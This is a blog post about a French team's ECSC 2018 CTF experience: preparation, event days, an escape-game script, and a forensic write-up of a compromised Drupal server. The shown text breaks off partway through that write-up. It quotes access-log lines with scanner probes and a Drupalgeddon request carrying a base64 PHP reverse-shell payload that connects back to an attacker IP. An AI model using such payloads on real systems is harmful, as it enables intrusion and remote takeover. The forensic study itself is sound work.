<!DOCTYPE html>
<html lang="">
	
	


	<head>
    <link href="https://gmpg.org/xfn/11" rel="profile">
    	<meta charset="utf-8">
	<meta http-equiv="X-UA-Compatible" content="IE=edge">
	<meta http-equiv="Cache-Control" content="public" />
	<!-- Enable responsiveness on mobile devices -->
	<meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1">
	
	    
	    
	    
	
	<title>European CyberSecurity Challenge 2018 • Just another infosec blog</title>
	
	
	<meta name="twitter:card" content="summary"/>
<meta name="twitter:title" content="European CyberSecurity Challenge 2018"/>
<meta name="twitter:description" content="My personal feedback about ECSC competition in London."/>

	<meta property="og:title" content="European CyberSecurity Challenge 2018" />
<meta property="og:description" content="My personal feedback about ECSC competition in London." />
<meta property="og:type" content="article" />
<meta property="og:url" content="https://maki.bzh/articles/feedback_ecsc2017/" />
<meta property="article:published_time" content="2018-11-24T00:00:00&#43;00:00"/>
<meta property="article:modified_time" content="2018-11-24T00:00:00&#43;00:00"/>


    		
	
	
	<link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/highlight.js/9.12.0/styles/solarized-dark.min.css" integrity="sha256-90Y+fvi28WF+3jKH4tHEkoQ9WLeFKJjpvCPNOtU9ZvU= sha384-s+7l2WBKs5ChgZ+esoTV0aWZRcma7BxuSHlzBJz6PH4Cc4ZX3/ErQZtk+ZzYQy/X sha512-BiC3DH0qMCjCYqPNGAthQ95QCndm60uhfQVwhqZ2eG1zuGkP+3T1cw6PzEC4CiRfRIbd2qvyN39RoDfil/XcMA==" crossorigin="anonymous">
	
	
	

	<link rel="stylesheet" href="/css/hyde-hyde.css" integrity="sha256-cUUT8nKBmejGAmxYnpOnspTmwap5Sjc/nzRfeTTjgeQ=" crossorigin="anonymous">
	<link rel="stylesheet" href="/css/custom.css" >
	<link rel="stylesheet" href="/css/print.min.css" media="print" integrity="sha256-obkLPMZU5Kb+rPwjMazkJLfYW8H9dj6yh8Gzzs2dv5c=" crossorigin="anonymous">

    <!-- HTML5 shim and Respond.js for IE8 support of HTML5 elements and media queries -->
    <!--[if lt IE 9]>
    <script src="https://oss.maxcdn.com/html5shiv/3.7.3/html5shiv.min.js" integrity="sha256-3Jy/GbSLrg0o9y5Z5n1uw0qxZECH7C6OQpVBgNFYa0g= sha384-qFIkRsVO/J5orlMvxK1sgAt2FXT67og+NyFTITYzvbIP1IJavVEKZM7YWczXkwpB sha512-UDJtJXfzfsiPPgnI5S1000FPLBHMhvzAMX15I+qG2E2OAzC9P1JzUwJOfnypXiOH7MRPaqzhPbBGDNNj7zBfoA==" crossorigin="anonymous"></script>
    <script src="https://oss.maxcdn.com/respond/1.4.2/respond.min.js" integrity="sha256-g6iAfvZp+nDQ2TdTR/VVKJf3bGro4ub5fvWSWVRi2NE= sha384-ZoaMbDF+4LeFxg6WdScQ9nnR1QC2MIRxA1O9KWEXQwns1G8UNyIEZIQidzb0T1fo sha512-qWVvreMuH9i0DrugcOtifxdtZVBBL0X75r9YweXsdCHtXUidlctw7NXg5KVP3ITPtqZ2S575A0wFkvgS2anqSA==" crossorigin="anonymous"></script>
    <![endif]-->
    <!-- Icons -->
    <link rel="shortcut icon" href="/favicon.png">
    	

</head>


	<body >
				
		<div class="sidebar">
			<div class="container sidebar-about ">
				<span class="site__title">
				
					<a href=""></a>
				</span>
				<a href="https://maki.bzh/">
					
					
					
					<div class="author-image">
						<img src="https://maki.bzh/img/maki.jpg" alt="Author Image" class="img--circle img--headshot element--center"/>
					</div>
					
				</a>
				<p class="site__description">
					<a href="https://maki.bzh/en">
						
					</a>
				</p>
				<div>
	<ul class="sidebar-nav">
		 
		 
			 
				<li>
					<a href="/articles/">
						<span>Articles</span>
					</a>
				</li>
			 
		 
			 
				<li>
					<a href="/walkthrough/">
						<span>Walkthrough</span>
					</a>
				</li>
			 
		 
			 
				<li>
					<a href="/stupidthings/">
						<span>Stupid Things</span>
					</a>
				</li>
			 
		 
			 
				<li>
					<a href="/ctf/">
						<span>CTF</span>
					</a>
				</li>
			 
		 
			 
				<li>
					<a href="/friends/">
						<span>Friends</span>
					</a>
				</li>
			 
		 
			 
				<li>
					<a href="/whoami/">
						<span>Who Am I?</span>
					</a>
				</li>
			 
		
	</ul>
</div>

				
				<section class="social">
						
						<a href="https://twitter.com/maki_mitz" rel="me"><i class="rotate fab fa-twitter fa-lg" aria-hidden="true"></i></a>
						
						
						
						
						
						<a href="https://gitlab.com/maki_chaz" rel="me"><i class="rotate fab fa-gitlab fa-lg" aria-hidden="true"></i></a>
						
						
						
						
						
						
						
						
						
						
						<a href="mailto:Yml0ZWRlcG91bGV0" rel="me"><i class="rotate fas fa-at fa-lg" aria-hidden="true"></i></a>
						
						
					  &nbsp;<a href="https://www.root-me.org/Maki-37744" target="blank" class="linklogo"><div class="rotate rootme_logo logohover"></div></a>
					  
						
					  &nbsp;<a href="https://www.hackthebox.eu/home/users/profile/10265" target="blank" class="linklogo"><div class="rotate hackthebox_logo logohover"></div></a>
					  
						
					  &nbsp;<a href="https://www.aperikube.fr" target="blank" class="linklogo"><div class="rotate aperikube_logo logohover"></div></a>
					  
</section>

				
				
				<p class="copyright">
					&copy; 2020 Maki.
					<br/>
					<a href="https://creativecommons.org/licenses/by-nc-sa/4.0/">Some Rights Reserved</a>.
					<br/>Built with, Haax, Laluka, _ACKNAK_
					<a href="https://gohugo.io">Hugo</a> ❤️ <a href="https://github.com/htr3n/hyde-hyde">hyde-hyde</a>.
					
				</p>
			</div>
		</div>

		<div class="content container">
			
	<article>
	<header>
		<h1>European CyberSecurity Challenge 2018</h1>
		
		
<div class="post__meta">
	
	<i class="fas fa-calendar-alt"></i> Nov 24, 2018
	
	
	<br/>
	<i class="fas fa-clock"></i> 36 min read
</div>


	</header>
	<hr/>
	<div class="post">
		<nav id="TableOfContents">
<ul>
<li><a href="#introduction">Introduction</a></li>
<li><a href="#nuit-du-hack">Nuit du hack</a></li>
<li><a href="#anssiminaire">ANSSIminaire</a>
<ul>
<li><a href="#day-1-getting-ready-for-the-event">Day 1 - Getting ready for the event</a>
<ul>
<li><a href="#introducing-the-ctf">Introducing the CTF</a></li>
</ul></li>
<li><a href="#day-2-level-evaluating-ctf">Day 2 - Level evaluating CTF</a>
<ul>
<li><a href="#forensic">Forensic</a></li>
<li><a href="#dfir">DFIR</a></li>
<li><a href="#crypto">Crypto</a></li>
<li><a href="#others">Others</a></li>
</ul></li>
</ul></li>
<li><a href="#online-training">Online training</a>
<ul>
<li><a href="#platform">Platform</a></li>
<li><a href="#personal">Personal</a></li>
</ul></li>
<li><a href="#ecsc-event">ECSC Event</a>
<ul>
<li><a href="#sunday">Sunday</a></li>
<li><a href="#monday">Monday</a>
<ul>
<li><a href="#ctf-day-1">CTF - Day 1</a>
<ul>
<li><a href="#forensics">Forensics</a></li>
<li><a href="#ctf-1-fair-play-you-said">CTF 1 - Fair play you said?</a></li>
<li><a href="#flag-em-all">Flag&rsquo;em all</a></li>
</ul></li>
<li><a href="#restaurant">Restaurant</a></li>
<li><a href="#getting-ready-for-the-next-day">Getting ready for the next day</a>
<ul>
<li><a href="#bandstand-finding-the-code">Bandstand - Finding the code</a></li>
<li><a href="#oral-presentation">Oral presentation</a>
<ul>
<li><a href="#writeup-examplia-forensics-linux-enisaforensics1a">[Writeup] Examplia Forensics - Linux [ENISAForensics1a]</a>
<ul>
<li><a href="#a-visitor-with-an-agenda">A visitor with an Agenda</a></li>
<li><a href="#computer-slowing-down">Computer slowing down</a></li>
<li><a href="#the-injection">The injection</a></li>
<li><a href="#finding-the-miner">Finding the Miner</a></li>
<li><a href="#the-final-target">The Final Target</a></li>
</ul></li>
<li><a href="#slide-show">Slide show</a></li>
</ul></li>
</ul></li>
</ul></li>
<li><a href="#tuesday">Tuesday</a>
<ul>
<li><a href="#ctf-day-2">CTF - Day 2</a></li>
<li><a href="#bandstand-escape-game">Bandstand - &ldquo;Escape game&rdquo;</a>
<ul>
<li><a href="#room-description">Room description</a></li>
<li><a href="#challenge-1-2">Challenge 1 &amp; 2</a></li>
<li><a href="#challenge-3">Challenge 3</a></li>
<li><a href="#challenge-4">Challenge 4</a></li>
<li><a href="#challenge-5">Challenge 5</a></li>
</ul></li>
<li><a href="#back-to-the-ctf">Back to the CTF</a>
<ul>
<li><a href="#hardware-challenge">Hardware challenge</a></li>
<li><a href="#other-challenges">Other challenges</a></li>
</ul></li>
<li><a href="#final-countdown">Final countdown</a></li>
<li><a href="#end-of-the-ctf">End of the CTF</a></li>
</ul></li>
<li><a href="#wednesday">Wednesday</a></li>
</ul></li>
<li><a href="#conclusion">Conclusion</a></li>
<li><a href="#writeups">Writeups</a>
<ul>
<li><a href="#ma-baker-reverse">Ma Baker - Reverse</a>
<ul>
<li><a href="#the-algorithm">The algorithm</a></li>
<li><a href="#the-attack">The attack</a></li>
</ul></li>
<li><a href="#curious-service-pwn">Curious service - Pwn</a>
<ul>
<li><a href="#the-algorithm-1">The algorithm</a></li>
<li><a href="#the-attack-1">The attack</a></li>
</ul></li>
<li><a href="#ma-baker-returns-reverse">Ma Baker returns - Reverse</a>
<ul>
<li><a href="#the-algorithm-2">The algorithm</a></li>
<li><a href="#the-attack-2">The attack</a></li>
</ul></li>
<li><a href="#vigenere-cipher-cracking-crypto">Vigenere Cipher Cracking - Crypto</a>
<ul>
<li><a href="#finding-the-key-size">Finding the key size</a></li>
<li><a href="#finding-the-key">Finding the key</a></li>
<li><a href="#decrypting-the-ciphertext">Decrypting the ciphertext</a></li>
</ul></li>
<li><a href="#online-banking-otp-token">Online Banking OTP Token</a></li>
<li><a href="#know-your-brand-forensic-analysis-enterprise1-forensic">Know Your Brand - Forensic Analysis [Enterprise1] - Forensic</a>
<ul>
<li><a href="#setup">Setup</a></li>
<li><a href="#prepare-the-volatility-image-part-1">Prepare the Volatility Image Part 1</a></li>
<li><a href="#prepare-the-volatility-image-part-2">Prepare the Volatility Image Part 2</a></li>
<li><a href="#analyse-the-memory-dump-part-1">Analyse the Memory Dump Part 1</a></li>
<li><a href="#analyse-the-memory-dump-part-2">Analyse the Memory Dump Part 2</a></li>
<li><a href="#locate-the-exploited-process">Locate the Exploited Process</a></li>
<li><a href="#locate-the-malicious-command">Locate the Malicious Command</a></li>
<li><a href="#establish-the-obfuscation-mechanism">Establish the Obfuscation Mechanism</a></li>
<li><a href="#locate-the-malicious-call">Locate the Malicious Call</a></li>
</ul></li>
<li><a href="#know-your-brand-rsa-analysis-crypto">Know Your Brand - RSA Analysis - Crypto</a>
<ul>
<li><a href="#analyze-packet-capture-data">Analyze Packet Capture Data</a></li>
<li><a href="#decrypt-the-ssl-traffic">Decrypt the SSL traffic</a></li>
<li><a href="#unzip-the-second-file">Unzip the second file</a></li>
</ul></li>
</ul></li>
</ul>
</nav>
		

<h1 id="introduction">Introduction</h1>

<p>In this article, I&rsquo;ll share the whole journey that lead me to this event, not just the CTF in itself. It is a totally subjective point of view, so the &ldquo;jump to section&rdquo; tool might come in handy if some parts seem useless to you.</p>

<p>First of all, I&rsquo;ll start by catching up on the &ldquo;Nuit du Hack&rdquo; event, where it all started for some of the members of the Apéri&rsquo;Kube, Hexpresso and Inshall&rsquo;hack teams. Then I&rsquo;ll review our training with the ANSSI before the competition. Finally I&rsquo;ll go over the ANSSI&rsquo;s training platform and the trip to London for the European Cyber Security Challenge.</p>

<p>Have fun ! :)</p>

<h1 id="nuit-du-hack">Nuit du hack</h1>

<p>During the last &ldquo;Nuit du Hack&rdquo; (NDH) event, the Apéri&rsquo;Kube team entered the public Wargame.
During the day, the ANSSI was giving out small plastic cards talking about a national selection for a European CTF taking place in London. This selection was to take place during the NDH&rsquo;s public Wargame.</p>

<p><center>
<img src="/img/ecsc2018/anssi1.png" alt="" />
<em>Fig 1</em>: ANSSI flyers
</center></p>

<p>At that time, I personally made the choice to tuck the card at the bottom of my (full of goodies) bag and to concentrate on the Wargame, with the goal to beat the Hexpresso team :D
Our team ended up finishing second on the final scoreboard!</p>

<p><center>
<img src="/img/ecsc2018/scoreboardndh18.png" alt="" />
<em>Fig 2</em>: Scoreboard NDH
</center></p>

<p>After discussing it with the Apéri&rsquo;Kube team and our friends and relatives, 6 members of the team and I applied for the European Cyber Security Challenge.</p>

<p>A few days later, I was contacted to establish a summary of the Apéri&rsquo;Kube members that applied. Actually, to enter this CTF, the team needed to be made of :</p>

<ul>
<li>5 members aged 14 to 20</li>
<li>5 members aged 21 to 25</li>
<li>3 substitutes</li>
</ul>

<p>In the end, the final list was released on the 6th of July 2018. It was made of :</p>

<ul>
<li>Antoxyde</li>
<li>Areizen</li>
<li>Chaign_c</li>
<li>DrStache</li>
<li>ENOENT</li>
<li>Gnomino</li>
<li>Iptior</li>
<li>Kara</li>
<li>Maki</li>
<li>Nico (@dev2lead)</li>
<li>Paul (from INSecurity)</li>
<li>Sideway</li>
<li>XeR</li>
</ul>

<p>We were invited the 10th and 11th of September to the ANSSI&rsquo;s headquarters.</p>

<h1 id="anssiminaire">ANSSIminaire</h1>

<p>The ANSSI welcomed us on the 10th and 11th of September to prepare for the event, but it was also the opportunity to meet and spend some time with the coaches.</p>

<h2 id="day-1-getting-ready-for-the-event">Day 1 - Getting ready for the event</h2>

<p>Upon arrival, we all introduced ourselves. I had already met Antoxyde before, during the Insomni&rsquo;hack&rsquo;s CTF. We also met the coaches :</p>

<ul>
<li>Virtualabs</li>
<li>Ack</li>
<li>Heurs</li>
</ul>

<p>We also met the person in charge of being the link between us, the ANSSI and the ECSC&rsquo;s organizing team.</p>

<h3 id="introducing-the-ctf">Introducing the CTF</h3>

<p>After everyone&rsquo;s introduction, the ANSSI introduced us the European Cyber Security Challenge and its history. This event has been organized for 6 year by the ENISA, an agency of the European Union in charge of its network and information security. At the beginning, it was an attack/defense CTF, with only a few countries (5 to 6). In 2017, 10 countries were invited, and 19 in 2018 ! The CTF type changed and became a jeopardy challenge, with additional strategic features.</p>

<p>In the end, 2 of the countries out of 19 couldn&rsquo;t make it, Luxembourg and Scotland. Indeed, to be part of a national team, the members must have the country&rsquo;s nationality and none of theses 2 countries could build up a team in time. Another thing : each country gets to choose its recruitment process, the only conditions set up by the ENISA being the age of the team members, 5 aged 14 to 20 and 5 aged 21 to 25.</p>

<p>The competition takes place during 2 days, between 10am and 6 pm roughly. The first day challenges are not available on the second day and vice-versa, so it is important to prioritize the challenges to complete throughout the day.</p>

<p>Each country represents a cyber security company. The challenges take the form of contracts to execute : for each contract you finish, you earn a certain amount of money and reputation. At that time, we thought that the virtual currency system would be useful to unlock other contracts, exchange information, etc. Moreover, in the challenges&rsquo; synopsis the coaches received, blockchain was mentioned so we imagined we would deal with a local crypto-currency. In the end, the money was just a name for the points we earned, and the blockchain was used in a forensic challenge. The reputation would have been useful to unlock certain challenges, but in the end it was not used during the competition.</p>

<p>The contracts are in fact a few challenges linked together with a scenario. For example, each first flag of a contract including archive files was the MD5 of the file. Then we would enter the real technical part of the challenge and end it by sending a small report.</p>

<p>There were 3 types of special challenges.
The first one consisted in an oral presentation of 10 minutes in English about one of the first day challenges. We could earn up to 60% of the points of said challenge.
The second one was a 30 minutes escape game. Only 4 members of the team were allowed, including the captain. We didn&rsquo;t know much about it, only that we maybe would have to pick locks. I&rsquo;ll explain it in further details later on.
The last one consisted in a &ldquo;Boot2root&rdquo; VM challenge : we had to become root as fast as possible. Those challenges were named &ldquo;CTF1&rdquo;, &ldquo;CTF2&rdquo;, etc. It was possible to earn points with the intermediate steps, but when a team would finish one of those, the challenge would disappear from the platform for everyone else.</p>

<p>Finally, the ENISA didn&rsquo;t specify anything concerning bringing a server bay or building a local network. Since we didn&rsquo;t know if we would have an Internet access or not, it was an idea we brought up to the ANSSI. We were later told that we would have an Internet access, so we chose to build a remote infrastructure.</p>

<p><center>
<img src="/img/ecsc2018/anssi3.png" alt="" />
<em>Fig 3</em>: France Team
</center></p>

<h2 id="day-2-level-evaluating-ctf">Day 2 - Level evaluating CTF</h2>

<p>On the second day, the ANSSI organized a small CTF. We were divided in 4 teams and spent the day solving challenges together.
On the menu, forensic, crypto, reverse and DFIR challenges. I was in a team with Nico, Antoxyde and Sideway.</p>

<p><center>
<img src="/img/ecsc2018/anssi2.png" alt="" />
<em>Fig 4</em>: ANSSI training
</center></p>

<h3 id="forensic">Forensic</h3>

<p>Among the challenges I could flag, there were 3 forensic challenges :</p>

<ul>
<li>Discovering Bob&rsquo;s password : I just had to use the Mimikatz volatility plugin on the memory dump.</li>
<li>A 3 challenges set about a malware : the first 2 challenges were about finding the register key and the malware&rsquo;s mutex.</li>
<li>A LUKS challenge, I forgot what exactly it was about.</li>
</ul>

<p>As far as I&rsquo;m concerned, I had a lot of fun solving those challenges, even though I had to re-install my VM right in the middle because of a badass update that broke it all. Pro-tip : after a kernel update, don&rsquo;t forget to reboot your machine to re-activate the drivers, like dm-crypt for cryptsetup&hellip;</p>

<h3 id="dfir">DFIR</h3>

<p>The Digital Forensic Incident Response (DFIR) challenges were focused on websites that had been pwned. We had to understand how, re-exploit the vulnerability and write a small report that one of the coaches had to validate. Nico did that part.</p>

<h3 id="crypto">Crypto</h3>

<p>The only challenge I looked up in that part was the malware one after the two forensic challenges. It used AES, and the vulnerability was in the AES CTR counter.
Antoxyde did the rest, and he did good !</p>

<h3 id="others">Others</h3>

<p>There were other challenges, for example the reverse ones, Sideway did wonders with them ! It was a good first experience of working together as part of the national team.</p>

<p>At the end of the day, the coaches chose someone to be the team captain&hellip; and they chose me. I had mixed up feelings about it, between the &ldquo;Yay I&rsquo;m super proud&rdquo; and the &ldquo;Why me I&rsquo;m gonna die&rdquo;.</p>

<p><center>
<img src="https://media.giphy.com/media/RLi2oeVZiVkE8/giphy.gif" alt="" />
<em>My feelings at this moment</em>
</center></p>

<h1 id="online-training">Online training</h1>

<p>Right after the 2 days in Paris, the ANSSI opened up an online training platform, in addition to the Virtualabs and Heurs challenges.</p>

<h2 id="platform">Platform</h2>

<p>The challenges were slightly different, but I worked on the same types : forensic crypto, reverse, web and pwn. It was very interesting, I learned a few useful tricks like the Snappi one (you can find a similar challenge on my platform : <a href="https://ctf.maki.bzh">https://ctf.maki.bzh</a>).</p>

<h2 id="personal">Personal</h2>

<p>As far as I&rsquo;m concerned, I went on with my forensic learning and tried to rationalize my actions when facing certain types of files, instead of YOLOing my way through it and breaking my VMs down half of the time.</p>

<p>I built a VM based on the &ldquo;Tsurugi&rdquo; Linux distribution (<a href="https://tsurugi-linux.org/">https://tsurugi-linux.org/</a>), which was made by a colleague of mine (Openminded). It includes all the forensic tools, and allowed me to beta test this distribution while learning a bit more about forensic.</p>

<p>I will soon write an other post about the methods I&rsquo;m using in CTF, with little tips and tricks : stay tuned !</p>

<h1 id="ecsc-event">ECSC Event</h1>

<p>After all the preparations, it was time for the event to begin ! It started with a nice and cozy bromance evening at GlaCius&rsquo; place ❤</p>

<p><center>
<img src="https://media.giphy.com/media/Q2aN4iiaibCus/giphy.gif" alt="" />
<em>Booya</em>
</center></p>

<h2 id="sunday">Sunday</h2>

<p>With ENOENT and DrStache, we took the train from Vannes to Paris to join the rest of the team and board on the Eurostar. But when we arrived at the Gare du Nord, there was a ruckus caused by a bomb alert : what a way to start&hellip; After almost missing our train, we were finally on our way towards London.</p>

<p>Upon arrival we headed to the CTF facility to set up our equipment, so that we could arrive the next morning and start right off without losing time.</p>

<p>Afterwards, we went to the hotel : we were on the tenth story of a 4 stars with ENOENT, it was really cool.</p>

<p>At the end of the day, all the countries were invited to watch the teams&rsquo; introduction videos. In the French one, we were represented by avatars. Big up to the Italians whose video was really funny, and to the Estonians with their Hackerman style.</p>

<p>After the reception, Virtualabs presented us a few hardware, radio frequency and steganography techniques. We set up a CTF pad on my VPS. Which crashed during the night, and since I had set it on my 5000 port, it was blocked by the ECSC network anyway. Hence the lack of CTF platform, sorry guys.</p>

<h2 id="monday">Monday</h2>

<p>In the morning, we had access to a huge buffet : scrambled eggs, sausages, beans&hellip; When we finished stuffing our stomachs, we proceeded to register ourselves with the ECSC team. We finished setting up the place, and were on the starting blocks at 10am for the beginning of the CTF.</p>

<p>We tried to organize ourselves according to our specialties : crypto guys next to the reverse guys, next to the forensic guys, etc., so that we could all communicate well. In the end, it didn&rsquo;t really matter but it reassured us : we had a strategy&hellip; kind of.</p>

<h3 id="ctf-day-1">CTF - Day 1</h3>

<p>As we were told, the strategic part with the balance between the money, the reputation and the contracts wasn&rsquo;t a thing anymore. There was only one strategy : <strong>to flag as many things as fast as possible</strong>.</p>

<p>We were told our rank for the Bandstand (escape game) when we arrived, as well as the one for the oral presentation. The teams had to go one after the other, we were scheduled Tuesday at 11h40am for the bandstand and at 3pm for the oral.</p>

<p>After a quick glance, we noticed a lot of forensic challenges with heavy archives. After downloading them, we could see that they were in fact complete memory and disk dumps. For those challenges, there was no particular flag format, we just had to understand how the attacks were done and find the compromission&rsquo;s hints as we studied the archives.</p>

<p>We were in a bit of a rush, so my memory is a bit blurry, but I can remember a fun forensic challenge.</p>

<h4 id="forensics">Forensics</h4>

<p>There were different types of forensic challenges, one was about blockchains for example. We started the contract with a memory dump knowing that a fraudulent transaction had been completed. The first flags were really quite easy :</p>

<ul>
<li>Blockchain type</li>
<li>Incriminated users names</li>
<li>Finding the smartcontract</li>
</ul>

<p>This challenge was a fun one, Nico taught me lots of things about blockchains in general. In the end, we had to search for the emails in the memory dump and find the date of the fraudulent transaction. Lucky us, there was only one transaction this day, and we just had to hash it to get the flag.</p>

<p>Other challenges were based on real attacks, like drupalgeddon, packed malwares&hellip;
My personal analysis on the forensic challenges : they were much more realistic than other CTFs challenges, it was more like a real incident response in a CERT, not surreal puzzles. However, the lack of flag format really bothered us. Sometimes we would have the answer but since the flag was case-sensitive, it took us some time to enter it the right way.</p>

<h4 id="ctf-1-fair-play-you-said">CTF 1 - Fair play you said?</h4>

<p>Around 11am, the first Boot2Root, &ldquo;CTF1&rdquo;, was released. DrStache and Nico got onto it immediately. The entry point was found by DrStache quite quickly, a classical Local File Include (LFI). After dumping the website resources, there was the PHP exec() function with an injectable parameter.
The PHP function was in an &ldquo;action.php&rdquo; page, DrStach refreshed the page and&hellip; nothing. Error 404. We all try, but we got the same answer, and the Germans just next to us too.
I forwarded the issue to the organizing team, they told me they would reboot the machine. I learned later on thanks to the coaches that it was part of the game.
A few moments later, one team flagged the VM&hellip; Not very sporty to cut the entry points&hellip;</p>

<h4 id="flag-em-all">Flag&rsquo;em all</h4>

<p>The day went on, team France kept going. According to other coaches, we were the team that flagged the most during this first day. We ended up 4th, but the 3 first teams and the 2 behind us had already done the Bandstand. This challenge represented a huge amount of points at this moment of the competition.</p>

<p>Just before the end of the day, we decided to start the Bandstand. The first challenge consisted in finding a digicode to unlock the escape game&rsquo;s door. We had to empty a trash bag full of shredded paper to find it.</p>

<p>Results of this first day : we almost finished the platform, with only two little challenges missing.</p>

<h3 id="restaurant">Restaurant</h3>

<p>We went to the &ldquo;Giraffe&rdquo; restaurant in London with all the teams. The mood was quite chill, but it wasn&rsquo;t party time. Most of the teams didn&rsquo;t mix up and stayed together. I ate a good old chicken burger, with a brownie and a scoop of ice cream.</p>

<p>We had some time to sum up the day, and to get ready for the next one.</p>

<h3 id="getting-ready-for-the-next-day">Getting ready for the next day</h3>

<p>During the evening, we spent some time preparing for the special challenges : the Bandstand and the oral presentation.</p>

<h4 id="bandstand-finding-the-code">Bandstand - Finding the code</h4>

<p>Back to the hotel, everyone was busy cracking the code (except Nico, Gnomino, XeR and myself as we were preparing for the oral).</p>

<p>Among the shredded papers, there were multiple grids with letters in them (12, including the one with the digicode for the door), letters and a file with many 8 letters words in it (11 were crossed). Analyzing the letters, we could find which word was linked to which grid. The guys then deduced the pin codes. ENOENT noticed that the pin codes were linked to a rotation, for example :</p>

<blockquote>
<p>12345678
23456781
34567812</p>
</blockquote>

<p>It was then possible to deduce the pin and password thanks to the Sideway&rsquo;s code :</p>

<pre><code class="language-python">import hashlib

letters = &quot;PQIOCFTHAXDSWEJMLYRGZ&quot;.lower()

# migrated
# https://raw.githubusercontent.com/dwyl/english-words/master/words_alpha.txt
wordlist = open(&quot;./words_alpha.txt&quot;, &quot;r&quot;).read().split(&quot;\n&quot;)

grid = &quot;1234567890#0987654321&quot;

for w in wordlist:
    if len(w) == 8 and w[-1] == 'd':
        if all([i in letters for i in w]):
#            if len(set(w)) == len(w):
            print(w + &quot; / &quot; + ''.join([grid[letters.index(j)] for j in w]))
</code></pre>

<p>In the end, the door&rsquo;s code was :</p>

<blockquote>
<p>630741#</p>
</blockquote>

<h4 id="oral-presentation">Oral presentation</h4>

<p>The four of us worked on the oral presentation. Virtualabs took advantage of the day to prepare a template with France&rsquo;s colors. We all agreed that we had to do a more commercial presentation, since each team was supposed to be a cyber security firm.</p>

<p>The challenge we chose was the one with the most points we flagged : the &ldquo;Examplia Forensics - Linux  [ENISAForensics1a]&rdquo; worth 17,000 points.</p>

<h5 id="writeup-examplia-forensics-linux-enisaforensics1a">[Writeup] Examplia Forensics - Linux [ENISAForensics1a]</h5>

<p>Before getting to the oral presentation in itself, I&rsquo;ll get over the challenges in this contract. If I remember well, almost everyone on the team worked on it at one point or another. First of all, we began with a zip archive :</p>

<ul>
<li>Lmarmedforces.ovf : a VirtualBox virtual machine OVF descriptor</li>
<li>Lmarmedforces.mf : a manifest file containing the SHA1 hashes of the OVF and VMDK files</li>
<li>Lmarmedforces-disk1.vmdk : a disk image of the compromised machine</li>
<li>linux_memory.vmem : a memory dump of the compromised machine</li>
</ul>

<h6 id="a-visitor-with-an-agenda">A visitor with an Agenda</h6>

<p>The first part was about finding the attacker&rsquo;s entry point. The client thought he went through his CMS: Drupal. After a bit of research, we found something interesting in the <code>acces.log</code> file :</p>

<pre><code class="language-bash">$ grep eval /var/log/apache2/access.log
192.168.124.169 - - [23/Aug/2018:00:00:59 +0300] &quot;GET /cfdocs/expeval/displayopenedfile.cfm HTTP/1.1&quot; 404 10134 &quot;-&quot; &quot;Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000942)&quot;
192.168.124.169 - - [23/Aug/2018:00:00:59 +0300] &quot;GET /cfdocs/expeval/sendmail.cfm HTTP/1.1&quot; 404 10080 &quot;-&quot; &quot;Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:000943)&quot;
192.168.124.169 - - [23/Aug/2018:00:00:59 +0300] &quot;GET /cfdocs/snippets/evaluate.cfm HTTP/1.1&quot; 404 10087 &quot;-&quot; &quot;Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:001012)&quot;
192.168.124.169 - - [23/Aug/2018:00:02:06 +0300] &quot;GET /contrib/forms/evaluation/C_FormEvaluation.class.php?GLOBALS[fileroot]=http://cirt.net/rfiinc.txt? HTTP/1.1&quot; 404 10301 &quot;-&quot; &quot;Mozilla/5.00 (Nikto/2.1.6) (Evasions:None) (Test:004564)&quot;
192.168.124.171 - - [23/Aug/2018:23:50:56 +0300] &quot;POST /?q=user/password&amp;name%5b%23post_render%5d%5b%5d=assert&amp;name%5b%23markup%5d=eval%28base64_decode%28Lyo8P3BocCAvKiovIGVycm9yX3JlcG9ydGluZygwKTsgJGlwID0gJzE5Mi4xNjguMTI0LjE3MSc7ICRwb3J0ID0gNDU2NzsgaWYgKCgkZiA9ICdzdHJlYW1fc29ja2V0X2NsaWVudCcpICYmIGlzX2NhbGxhYmxlKCRmKSkgeyAkcyA9ICRmKCJ0Y3A6Ly97JGlwfTp7JHBvcnR9Iik7ICRzX3R5cGUgPSAnc3RyZWFtJzsgfSBpZiAoISRzICYmICgkZiA9ICdmc29ja29wZW4nKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZigkaXAsICRwb3J0KTsgJHNfdHlwZSA9ICdzdHJlYW0nOyB9IGlmICghJHMgJiYgKCRmID0gJ3NvY2tldF9jcmVhdGUnKSAmJiBpc19jYWxsYWJsZSgkZikpIHsgJHMgPSAkZihBRl9JTkVULCBTT0NLX1NUUkVBTSwgU09MX1RDUCk7ICRyZXMgPSBAc29ja2V0X2Nvbm5lY3QoJHMsICRpcCwgJHBvcnQpOyBpZiAoISRyZXMpIHsgZGllKCk7IH0gJHNfdHlwZSA9ICdzb2NrZXQnOyB9IGlmICghJHNfdHlwZSkgeyBkaWUoJ25vIHNvY2tldCBmdW5jcycpOyB9IGlmICghJHMpIHsgZGllKCdubyBzb2NrZXQnKTsgfSBzd2l0Y2ggKCRzX3R5cGUpIHsgY2FzZSAnc3RyZWFtJzogJGxlbiA9IGZyZWFkKCRzLCA0KTsgYnJlYWs7IGNhc2UgJ3NvY2tldCc6ICRsZW4gPSBzb2NrZXRfcmVhZCgkcywgNCk7IGJyZWFrOyB9IGlmICghJGxlbikgeyBkaWUoKTsgfSAkYSA9IHVucGFj.aygiTmxlbiIsICRsZW4pOyAkbGVuID0gJGFbJ2xlbiddOyAkYiA9ICcnOyB3aGlsZSAoc3RybGVuKCRiKSA8ICRsZW4pIHsgc3dpdGNoICgkc190eXBlKSB7IGNhc2UgJ3N0cmVhbSc6ICRiIC49IGZyZWFkKCRzLCAkbGVuLXN0cmxlbigkYikpOyBicmVhazsgY2FzZSAnc29ja2V0JzogJGIgLj0gc29ja2V0X3JlYWQoJHMsICRsZW4tc3RybGVuKCRiKSk7IGJyZWFrOyB9IH0gJEdMT0JBTFNbJ21zZ3NvY2snXSA9ICRzOyAkR0xPQkFMU1snbXNnc29ja190eXBlJ10gPSAkc190eXBlOyBpZiAoZXh0ZW5zaW9uX2xvYWRlZCgnc3Vob3NpbicpICYmIGluaV9nZXQoJ3N1aG9zaW4uZXhlY3V0b3IuZGlzYWJsZV9ldmFsJykpIHsgJHN1aG9zaW5fYnlwYXNzPWNyZWF0ZV9mdW5jdGlvbignJywgJGIpOyAkc3